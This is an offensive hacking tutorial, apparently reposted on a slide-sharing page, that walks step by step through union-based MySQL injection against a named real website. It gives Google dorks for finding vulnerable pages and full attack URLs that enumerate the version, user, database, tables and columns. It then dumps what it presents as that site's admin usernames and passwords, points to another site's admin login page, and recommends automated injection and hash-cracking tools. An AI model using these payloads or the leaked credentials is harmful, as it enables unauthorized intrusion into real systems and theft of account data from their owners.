Sql full tutorial

MySQL Injection[FULL TUTORIAL]

Structure:
1.Intro#
2.What is SQL
3.MySQL
4.How to find vulnerability
5.Exploiting Mysql vulnerability
6.Getting Mysql Version
7.Getting Mysql User
8.Getting Mysql Databases
9.Getting Mysql Tables
10.Getting Mysql Columns
11.Getting Information From Columns
12.Finding Admin Panel
13.Tools
14.Greetz
15.End#
1. Intro#Hello my name is AlphaSky today am going to explain MySQL Injection on
Live Example.What that means?-Well it means that i'll exploit an real site.This
tutorial is for anykind level reader,student,newbie even noob.I just wonna to show
you how easy is this prefor of Attack.So enough talking we have a lot of things to
cover here.
2. What is SQL?

SQL injection is probably the most abundant programming flaw that exists on the
internet at present. It is the vulnerability through which unauthorized person can
access the various critical and private dat. SQL injection is not a flaw in the web or
db server but but is a result of the poor and inexperienced programming practices.
And it is one of the deadliest as well as easiest attack to execute from remote
location.In SQL injection, we interact with DB server with the various commands

and get various data from it. In this tutorial, I would be discussing 3 aspects of
SQL injection namely bypassing logins, accessing the secret data and modifying
the page contents.
3. MySQL

MySQL is a relational database management system (RDBMS) that runs as a server
providing multi-user access to a number of databases. It is named after developer
Michael Widenius daughter, My. The SQL phrase stands for Structured Query
Language.=So the basic what you need to know about SQL and MySQL are done
now the real part begins
4. How to find vulnerability
There many many ways to find vulnerability.Most familiar ways are using the
Google
Dorks:inurl:index.php?id=inurl:article.php?id=allinurl:news.php?id=inurl:shop.ph
p?cat=Hackers always say "Google is my Best Friend" now you know way without
of google we couldn't do our job so easy.So at the end of this tutorial i'll post a
dork list so am going to save you from searching the internet.
5. Exploiting Mysql vulnerability
So lets start with exploiting our target.For this tutorial i decided to chose
European Table Tennis Union
Code:
http://www.ettu.org

I have used a dork inurl:news_view.php?id= and i got this link of the site
Code:
http://www.ettu.org/news_view.php?id=2583

So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or
% at the and or before the id.Now our vuln. link should look like this
Code:
http://www.ettu.org/news_view.php?id=2583'

Did you notice something was changed?-Yes the content that was previos on the
site was not showed.So this is a sing that this site may be vuln. on MySQL
Injection sometimes will print you a message that says
Code:
Warning:
mysql_fetch_assoc(),Warning:
mysql_fetch_array(),mysql_num_rows(),mysql
error,mysql_query,mysql_fetch,mysql_connect

In this case doesn't show so we also may be facing with MySQL NoError
Injection.How can we know for sure is it vuln.?-We are going to start
typeingORDER BY 1 After the ID number
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1

So our content is shown agaen.And now we are sure we're facing a site that is
vuln. on MySQLInjection.We continue to incrise the Order Number so we find out
how many columns are there until we get an blan page agaen.
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2 <== No blank Page

Code:

Code:

Code:

Code:

Code:

Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page

wOOt!! We now know that there are 16 vuln. columns!!Now we are going to select
them all with this comand UNION SELECT or UNION ALL SELECT
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1
4,15,16--

Dont forget to put "--" at the end or it will return an blank page.So the content
loads agaen and lets see witch of these vuln. columns we can use.To do that we
add a '-' before the ID Number
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

So this is very important if you dont do this you cannot continue to do the next
several steps and now it prints us a vuln. columns number 2 and number 4.So this
means that columns with number 2 and 4 are vulnruble and we can use them.To
get Mysql version,User,Databases.
6. Getting Mysql Version

To get MySQL version we use version() or @@version commands to dispaly version
of MySQL Database.So we change 2 into @@version and
Code:

http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11
,12,13,14,15,16--

there is it MySQL Version displayed at the page.
Code:
5.1.37-1ubuntu5.5

So when MySQL Version is 5> we can use information_schema to get data faster
but if version is >5 that means that we need to guess the tables and columns.So
we need to be very lucky to guess the tabale and column.
7. Getting Mysql User

Getting the user is with the user() command
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Displayed
Code:
ettu_admin@localhost

8. Getting Mysql Databases

So now we need to get the databases with the followed command database()
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Displayed
Code:
ettu.org_ettu_db01

Sometimes there are more databases so it good to know how many databases
there are and why are they for. Because maybe the data we are looking is in the
other database.
9. Getting Mysql Tables

And here we are at the main think.How to find out the table names.We are going
to do this with adding this command
Code:
group_concat(table_name)

at the place of the vun. column and in our case is 2 and with adding at the end of
the number of columns the following command
Code:

FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()

What does this mean?-This means to select Table Names from
information_schema where table schema is from the Database. and when we
replace everything we get this link and this tables:
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+
ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-F

We got a lots of tables but we dont need them all so am going to press Ctrl+F
[Find specific word] and type user,users,admin,members and it turns out that
there is a table with the name
Code:
0910ettucup01_admin

Now we know that there is table with name admin and there must be some
username and passwords but to that we need to find the columns in that table!
10.Getting Mysql Columns

We found out that theres a table admin and now we need to find the columns we
need to change table_name to column_name and
Code:
FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-to

INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()-FROM
+

Now when we change all that we get
Code:
http://www.ettu.org/news_view.php?id=2583+UNION+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+
ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA=DATABASE()-F

with executing this we get a lot i mean really a lot of columns name that
we don't need and it may take a while till we find our most needed columns so we
are going to pull out only the columns from our table that we found earlier and
that is from ettu.org_ettu_db01 to do this we need to you MySQL Char How to find
it?-Well you can always use Google or you can install on your Mozilla an addon
with name HackBar there is a MySQL char converter so now am going to convert
our table into a MySQL Char
Code:

CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109, 105,
110)

Now where to put this?-We are going to change our link into:
Code:
http://www.ettu.org/news_view.php?id=2583+union+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+
from+information_schema.columns+where+table_name=CHAR%2848,%2057,%2049,%2048,%20101,%2
0116,%20116,

%20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097,%20100,%20109,%20105,%20110%29--

Now are displayed the columns that are in Table 'ADMIN'
Code:
id,login,password,stato,id_squ,girone,abilitato

Our work is almost done.Just to dump usernames and passwords.
11.Getting Information From Columns

To do this we are going to use a command that we are using it all the way till
here.And that is group_concat().All we now need to do is to change column_name
into our ectual column names and that are "login,password,id,stato ect" So lets
see how ill it looks
Code:
http://www.ettu.org/news_view.php?id=2583+union+select+1,group_concat(id,0x3a,login,0x3a,password),3,4,5,6,7,8,9,10,11,12,1
3,14,15,16+
rom+0910ettucup01_admin-f

Damn the user-names and passwords are displayed at the site.So let explain here
what we have done.We have changed information_schema.columns into the table
name 'cuz we dont need not to read the columns 'cuz we already put them into the
group_concat() you see id login password those are columns now from where to
be selected from the table name 0910ettucup01_admin and now we have our log
in details:
Code:
1:adminvitesse:vitesse2006
:admin:matchvitesse
2

All it left now is to find the Admin Panel....
12.Finding Admin Panel

Unfortunately our live example site doesn't have an admin panel so for this to
show you i'll took another site.So when you got the admin details we need to login
somewhere that somewhere is called Admin Panel or Control Panel or WebPanel
its same or you can say it Login Page.To find an log in page you can use many
tools ill tell you some in the next part.An example of an login page
Code:
http://www.discountexpress.co.uk/admin/

There you can enter the login info and get into the site and change alot
13.Tools

So tools,there aren't so much tools to use when your doing this but there are a
few that will help you a lot.

13.1.Admin Finder

Admin finder is a tool that helps you to find the admin page or Log In Page very
quick for this you can use many online or you can use some web scanner to find
it.Here are 1 Good program and one good Online Scanner Online Admin Page
ScannerAnd for download Acunetix Web Vulnerability Scanner=>This scanner
could be used for more things but now we are not going to talk about them

13.2 Hacking Tools that are making you're work easier

Well we all know that some of you have started with tools ex.Havij or MySQL
Helper.Yes they are good in hand expecialy when we are hacking into a MySQL
Server >5 that are guessing the table and column names so that is realy good also
Havij is a great program that have Admin Finder too and MD5 Section where you
can easly search about 10-12 MD5 Decripting sites so yes its realy good program
but dont use it for hacking all the way into the server 'cuz it leaves a lotz of logs
and you my be finish in jail
14.Greetz
Greetz To All Friends,All Hackers in the world,EveryPPL who are trying to learn
this!
15.End#
So this is the end of my tutorial.Feel free to comment,share it where ever you
wont and dont for get to Credit My Name.Am planing to continue to write tutorials
not for MySQL for a lot other things but we'll see how will the time effect us
-----MOZAAI MADHU HACKER

Sql full tutorial

More Related Content

What's hot (20)

Viewers also liked (7)

Similar to Sql full tutorial (20)

Recently uploaded (20)

Sql full tutorial